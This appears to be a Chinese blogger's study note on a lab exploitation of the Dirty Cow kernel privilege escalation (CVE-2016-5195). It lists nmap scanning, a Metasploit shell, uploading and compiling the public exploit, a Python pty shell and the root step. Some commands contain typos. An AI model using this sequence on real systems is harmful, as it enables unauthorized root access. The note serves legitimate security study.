脏牛(Dirty Cow)是Linux内核的一个提权漏洞,所以叫Dirty Cow
Linux内核的内存子系统在处理写入复制(copy-on-write, cow)时产生了竞争条件(race
condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限。脏牛的CVE编号是CVE-2016-5195
实验步骤
1:nmap 192.168.131.0/24 //扫描存活主机
2:nmap -p1-65535 192.168.131.172 //开放1898访问
MSF 直接利用
编译GCC
实验过程:
1. 找到漏洞利用模块拿到shell
2. download //下载exp 的cpp文件
3. meterret upload dcow.cpp //通过shell去上传cpp文件到目标主机上
4. upload /tmp/40837.cpp /tmp/40837.cpp //将cpp文件上传目标文件 tmp目录下 因为tmp目
录下文件有可读可写权限
5. g++ -wall -pedantic -o2 -std=c++11 -pthread -o dcow 40837.cpp -lutil
//通过编译cpp文件,编译成为c的可执行文件
6. python -c 'import pty; pty.spawn("/bin/bash")' //优化交互shell,普通交互shell情
况下无法执行 c的文件,需要通过python 写出一个交互shell 再去执行
7. ./docw执行文件 即可提权
以上内容博主作为笔记记录,部分解释不太详细,谅解